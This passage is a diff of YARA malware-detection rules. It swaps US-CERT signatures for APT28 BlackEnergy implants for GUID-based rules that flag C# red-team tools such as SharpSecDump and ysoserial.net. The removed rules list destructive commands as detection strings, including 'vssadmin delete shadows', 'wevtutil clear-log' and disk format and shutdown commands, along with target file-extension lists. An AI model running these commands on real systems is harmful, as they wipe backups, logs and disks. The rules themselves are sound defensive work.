-		logic_hash = "313f837b90bcf09455427e4411acb5406f4dae9d69373d8d2c0cfc014e27ee96"
-		score = 65
+		logic_hash = "a3255a00a1c2773d34e9e859c3394752ea6bfc164c4694a001c9a1c9b384756b"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = ".?AVAgentKernel@@"
-		$STR2 = ".?AVIAgentModule@@"
-		$STR3 = "AgentKernel"
-		$fp1 = "Panda Security S.L." wide
+		$typelibguid0lo = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii wide
+		$typelibguid0up = "26D498F7-37AE-476C-97B0-3761E3A919F0" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of ( $STR* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsearch : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "be4d222f-009f-5dde-93da-376626a77263"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L487-L503"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "459d8a34-f311-5459-8257-e7aa519174b5"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/SharpSearch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3839-L3853"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51135d9fe62f5fd1fb7ef6c386dcdd86525dd469064662c2314cfee6e952d6ec"
-		score = 85
+		logic_hash = "b213a12913abb631d67bf53049241a7087e3f9cda01fa66bd6c51bb1bd03c41f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64
-         C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF
-         32 C6 45 E0 2EE9 ?? ?? ?? ??}
-		$STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0
-            46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00}
+		$typelibguid0lo = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii wide
+		$typelibguid0up = "98FEE742-8410-4F20-8B2D-D7D789AB003D" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsecdump : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "2edaeb08-19bc-5ab4-bc75-40c16ba85d9f"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L505-L520"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "492dfb79-541a-589d-ac69-468e9b2ab9db"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/G0ldenGunSec/SharpSecDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3855-L3869"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd4edd238cdc3d376c1d5bcea6c8df57f4ef03369c0ca22107241812e0a1bb94"
-		score = 85
+		logic_hash = "645e2df929b88526daec94f5b828235899fe0c86822960777664f11106b8da8c"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64}
-		$BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32}
-		$CONSTANT = {26 80 AC C8}
+		$typelibguid0lo = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii wide
+		$typelibguid0up = "E2FDD6CC-9886-456C-9021-EE2C47CF67B7" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V3_Alternativerule : HIGHVOL FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Net_Gpppassword : FILE
 {
 	meta:
-		description = "Detects a group of different malware samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "47e9028b-7718-5372-8a1a-94c208c29ed4"
-		date = "2017-02-12"
-		modified = "2023-12-05"
-		reference = "US CERT Grizzly Steppe Report"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L788-L803"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a718f9fc-acf5-536e-81d6-d393cebe8f77"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/outflanknl/Net-GPPPassword"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3871-L3885"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35468f7699b96fcaaaa032eef7dae34ec314e9c652f9f8b2e8ca7343fb5cec50"
+		logic_hash = "234f75bfcb9aee331f063bd7c1984a2696067400fde7a1938a4929cd809b1345"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		comment = "Alternative rule - not based on the original samples but samples on which the original rule matched"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
 
 	strings:
-		$op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 }
-		$op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 }
+		$typelibguid0lo = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii wide
+		$typelibguid0up = "00FCF72C-D148-4DD0-9CA4-0181C4BD55C3" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Filesearcher : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "27a5fb98-fe8b-561c-b490-e04257e7dd1c"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L807-L822"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1b5f1f68-f87b-5e60-94a4-e2556b4e6c5d"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/NVISO-BE/FileSearcher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3887-L3901"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49c912f29f5ffbd90366a510285ef3f06c804af86829808c175c8be519ce01c4"
-		score = 85
+		logic_hash = "71492c6d4c1104cf47484556dc8ed1099348043102a4b7a9b1ffd180422078af"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$DK_format1 = "/c format %c: /Y /Q" ascii
-		$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
-		$DK_physicaldrive = "PhysicalDrive%d" wide
-		$DK_shutdown = "shutdown /r /t %d"
+		$typelibguid0lo = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii wide
+		$typelibguid0up = "2C879479-5027-4CE9-AAAC-084DB0E6D630" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $DK* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adfsdump : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "d203f3c6-4e86-5632-ad5d-61763ee59bbe"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L824-L838"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8cb2edcd-3696-5857-90ca-e99b1af54320"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/fireeye/ADFSDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3903-L3917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9d4233ccf148919d0ad0be726b9dfa9e26a9afcebb7b26fa4db4c3da8c46d13e"
-		score = 85
+		logic_hash = "5bf4c506a39a3ad33a19ab40ce85e6fb7c7efeab154444b14f008c22529b0779"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
+		$typelibguid0lo = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii wide
+		$typelibguid0up = "9EE27D63-6AC9-4037-860B-44E91BAE7F0D" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V7 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprdp : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "a0dda12a-22b6-53e6-9528-8c178ad871ad"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L859-L881"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d316ec0b-0313-52bb-923d-512fa08112f9"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xthirteen/SharpRDP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3919-L3933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27ae70d384488660c1f80040503d3eb6541112fd6332edc5820bc6718d76b847"
-		score = 85
+		logic_hash = "c1a51c556c3416095764d3e053d82081409cdd672db05b8680a985ec52bd24b8"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
-		$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
-		$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
-		$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
-		$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
-		$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
-		$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
-		$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
+		$typelibguid0lo = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii wide
+		$typelibguid0up = "F1DF1D0F-FF86-4106-97A8-F95AAF525C54" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_IMPLANT_4_V8
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcall : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "1e82d105-8dda-55c9-aec0-8f9f02c3a94e"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L883-L911"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "172415b6-0383-5da4-a88f-8ebe5daf9294"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/jhalon/SharpCall"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3935-L3949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd072702c59822587d7ede0bc59c5672fbaa9a05595940781554fadb32e109f7"
-		score = 85
+		logic_hash = "7084ac8956827fff5baefb92e117e0c64f13ab8f77cb5d034c31d874a6297047"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4
-         33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B
-         DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D
-         3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50
-         68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9
-         7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF
-         57 18}
-		$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08
-         2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00
-         8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8
-         89 45 F8 8B 4D EC 83 C1 08 89 4D FC}
-		$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF
-         66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66
-         8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00
-         F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
-         65 6C 54 FF 57}
-		$a1 = {83 EC 04 60 E9 1E 01 00 00}
+		$typelibguid0lo = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii wide
+		$typelibguid0up = "C1B0A923-0F17-4BC8-BA0F-C87AFF43E799" ascii wide
 
 	condition:
-		$a1 at pe.entry_point or any of ( $f* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V9
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ysoserial_Net : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "a404212a-d9ef-54c1-bbf8-a213ec094f18"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L913-L933"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "80483cd4-76e6-5629-bed7-4ae2e455222c"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/pwntester/ysoserial.net"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3951-L3967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c0e48bf0839965f9bda9cc475aba5b4934c27c426a8fa4423fb24aa9d792e2e4"
-		score = 85
-		quality = 77
-		tags = ""
+		logic_hash = "e423b73cd2dd2374a95ad0a36cd34d8d5b4d1085d708781857ea3893b31b22fb"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "wevtutil clear-log" ascii wide nocase
-		$b = "vssadmin delete shadows" ascii wide nocase
-		$c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
-		$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
-		$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52
-         50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89
-         44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ??
-         ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
-		$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
+		$typelibguid0lo = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii wide
+		$typelibguid0up = "E1E8C029-F7CD-4BD1-952E-E819B41520F0" ascii wide
+		$typelibguid1lo = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii wide
+		$typelibguid1up = "6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C" ascii wide
 
 	condition:
-		($a and $b ) or $c or $d or ( $openPhysicalDiskOverwriteWithZeros and $f )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V10 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Managedinjection : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "75c266ca-a27f-5ffe-a438-c35bbacfa70c"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L935-L966"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c66e7666-b54f-532d-90e1-870292047aec"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/malcomvetter/ManagedInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3969-L3987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f22fd45eb77ff1a8202f4bd0d0c43787c8184300e96aff021e13371ae7bd5553"
-		score = 85
-		quality = 81
+		logic_hash = "218fe8a52757def3c321668ecaaca3cb0966bad4e151083c08a98276abf71571"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = {A1B05C72}
-		$ = {EB3D0384}
-		$ = {6F45594E}
-		$ = {71815A4E}
-		$ = {D5B03E72}
-		$ = {6B43594E}
-		$ = {F572993D}
-		$ = {665D9DC0}
-		$ = {0BE7A75A}
-		$ = {F37443C5}
-		$ = {A2A474BB}
-		$ = {97DEEC67}
-		$ = {7E0CB078}
-		$ = {9C9678BF}
-		$ = {4A37A149}
-		$ = {8667416B}
-		$ = {0A375BA4}
-		$ = {DC505A8D}
-		$ = {02F1F808}
-		$ = {2C819712}
+		$typelibguid0lo = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii wide
+		$typelibguid0up = "E5182BFF-9562-40FF-B864-5A6B30C3B13B" ascii wide
+		$typelibguid1lo = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii wide
+		$typelibguid1up = "FDEDDE0D-E095-41C9-93FB-C2219ADA55B1" ascii wide
+		$typelibguid2lo = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii wide
+		$typelibguid2up = "0DD00561-AFFC-4066-8C48-CE950788C3C8" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 and 15 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V11 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsocks : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "e5fb0843-20f7-56a0-8eea-0db7cef7f610"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L968-L985"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "343061d9-e24e-5d49-939f-b94c295b17ac"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/nettitude/SharpSocks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3989-L4005"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bdeddc4334ed6557175b5eefc78d69283d6c91f98970bd0cfe6365b3ab477f4"
-		score = 85
+		logic_hash = "ef582f9ba7b49795886c69a48cf9ac11e86fb99c19463f0770f3e9c1e3e2e0c6"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$ = "/c format %c: /Y /X /FS:NTFS"
-		$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
-		$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
-		$ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
-		$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
+	strings:
+		$typelibguid0lo = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii wide
+		$typelibguid0up = "2F43992E-5703-4420-AD0B-17CB7D89C956" ascii wide
+		$typelibguid1lo = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii wide
+		$typelibguid1up = "86D10A34-C374-4DE4-8E12-490E5E65DDFF" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_4_V13 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Wmiexec : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "e96a7d9f-1840-542f-9a9b-95e74377f234"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1011-L1032"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ae08a5a2-06d5-55fe-803a-7f4696220904"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/checkymander/Sharp-WMIExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4007-L4021"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "576c07c44105d2a38ca715d366f68058b2b3118f25e91d2d3e2d20e932fc9453"
-		score = 85
+		logic_hash = "c5f515ac8db4cca0b29b6d27ad27fa1d4215de48d4827c083f755e88671b87e0"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
